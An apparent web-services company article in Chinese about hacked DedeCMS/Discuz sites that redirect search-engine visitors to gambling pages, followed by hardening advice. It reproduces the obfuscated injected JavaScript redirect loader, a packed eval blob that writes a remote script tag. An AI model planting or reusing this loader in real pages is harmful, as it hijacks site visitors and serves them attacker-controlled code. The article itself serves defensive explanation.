最近公司內部跟單同事表示,大批網(wǎng)站建設公司客戶(hù)在做百度推廣時(shí)候,網(wǎng)站的首頁(yè)點(diǎn)擊進(jìn)去后自動(dòng)跳轉到彩票網(wǎng)站、博彩網(wǎng)站,這樣用戶(hù)從百度搜索或者從推廣廣告位進(jìn)去網(wǎng)站后發(fā)生跳轉,而直接輸入網(wǎng)址是沒(méi)有任何跳轉的,這樣一來(lái)用戶(hù)流失造成訪(fǎng)問(wèn)量急劇下滑、網(wǎng)站服務(wù)器資源浪費、推廣費用浪費等,甚至可以說(shuō)做了百度推廣、搜狗推廣的都在給彩票公司做廣告了,在網(wǎng)站建設行業(yè)內引起軒然大波。
有不少客戶(hù)在反應這個(gè)問(wèn)題時(shí)候,找到廣告商賠償甚至追究責任,所以在網(wǎng)站惡意跳轉的問(wèn)題上我們運營(yíng)人員需要重視并且知曉如何快速解決,中聯(lián)科技從網(wǎng)絡(luò )上查閱并且測試后總結為以下經(jīng)驗:
一、分析網(wǎng)站被黑跳轉博彩網(wǎng)站原因
一般情況下網(wǎng)站被黑時(shí)候后都是因為服務(wù)器信息(服務(wù)器IP 遠程端口 管理員賬號密碼、SSH端口、root賬號密碼)和網(wǎng)站信息包括FTP賬號密碼的對接被黑客知曉,進(jìn)而造成黑客植入木馬或者后門(mén)。
整體的安全監測中,asp網(wǎng)站和php網(wǎng)站都存在著(zhù)木馬,這也就意味著(zhù)木馬能夠以php腳本木馬、asp腳本木馬、jsp腳本木馬而存在,這些木馬后門(mén)可以對網(wǎng)站進(jìn)行惡意篡改,上傳,改名,下載,等管理員的高權限操作。出現網(wǎng)站被跳轉的客戶(hù),采用的網(wǎng)站架構都是php+mysql架構,以及jsp+mysql架構,大多數用的是開(kāi)源程序,像dedecms,織夢(mèng)系統,phpcms系統,discuz系統。
當我們懂得一些代碼的時(shí)候,必然會(huì )看到網(wǎng)站首頁(yè)中會(huì )有一些惡意篡改代碼,通過(guò)刪除惡意代碼后可能會(huì )在幾天內完全的停止跳轉的,但是在一段時(shí)間后卻又會(huì )被跳轉,這個(gè)是很令人懊惱的治標不治本措施。過(guò)了不久后網(wǎng)站又會(huì )出現跳轉,那么針對于網(wǎng)站漏洞問(wèn)題是很難甚至是不能夠完全清除的。
通過(guò)觀(guān)察部分客戶(hù)網(wǎng)站首頁(yè),其首頁(yè)代碼中都會(huì )有一段加密代碼,這段代碼是根據搜索引擎的特征來(lái)跳轉,比如通過(guò)百度搜索,360搜索,搜狗搜索來(lái)的會(huì )直接跳轉到彩票,賭博網(wǎng)站上去。如下代碼:
type="text/java">eval(function(p,a,c,k,e,d){e=function(c){return(c35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){retun d[e]}];e=function(){return'\w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c]);return p;}('l["\e\c\1\m\i\8\n\0"]["\7\4\9\0\8"]('\h\2\1\4\9\3\0\0\j\3\8\d\6\0\8\k\0\5\f\a\r\a\2\1\4\9\3\0 \6\2\4\1\d\6\s\0\0\3\2\q\5\5\7\7\7\b\1\3\e\a\2\p\b\1\c\i \5\j\o\1\b\f\2\6\g\h\5\2\1\4\9\3\0\g');',29,29,'x74|x63|x73|x70|x72| x2f|x22|x77|x65|x69|x61|x2e|x6f|x3d|x64|x6a|x3e|x3c|x6d|x79|x78|window|x75|x6e|x6c| x38|x3a|x76|x68'.split('|'),0,{}))
一旦被攻擊之后,百度搜索引擎就會(huì )判斷出網(wǎng)站是否被攻擊,從而在百度風(fēng)險評估中心就會(huì )對網(wǎng)站進(jìn)行記錄以及標識,百度網(wǎng)址安全中心提醒您:該站點(diǎn)可能受到黑客攻擊,部分頁(yè)面已被非法篡改! 紅色提示該百度風(fēng)險。導致客戶(hù)打開(kāi)網(wǎng)站直接被百度攔截。
針對于以上跳轉攻擊的特征,中聯(lián)科技一致認為應該從人工代碼方面進(jìn)行審計,以及檢測網(wǎng)站漏洞、網(wǎng)站后門(mén)木馬清理、漏洞修復以及xss獲取管理員賬號cookies漏洞,discuz存在getshell漏洞,注入獲取管理員漏洞,discuz上傳繞過(guò)漏洞等。
二、修復以及防止網(wǎng)站被惡意跳轉的辦法
1、對服務(wù)器目錄進(jìn)行安全部署、對管理員帳號密碼加密、對所有密碼進(jìn)行數字+大小寫(xiě)字母+特殊符號要求、對網(wǎng)站數據庫進(jìn)行分配普通權限賬號。
2、mysql數據庫默認端口3306,改為61116,并加入到端口安全策略,不對外開(kāi)放,外網(wǎng)IP無(wú)法連接數據庫,只有本地127.0.0.1才能進(jìn)行連接數據庫,以防止攻擊者惡意猜測。
3、對服務(wù)器底層系統進(jìn)行安全加固,包括遠程端口登錄的安全驗證。
4、對網(wǎng)站代碼進(jìn)行整體的安全檢測,包括定期的升級網(wǎng)站程序源代碼,修復補丁以及網(wǎng)站漏洞。
中聯(lián)科技處理網(wǎng)站跳轉問(wèn)題有很多方法,以上內容只是解決問(wèn)題的方法之一,那么作為一個(gè)網(wǎng)站建設公司應該對源碼進(jìn)行優(yōu)化和調整,這樣才能確保后期的網(wǎng)站不會(huì )受到影響,這就涉及到網(wǎng)站源碼升級以及版本升級問(wèn)題。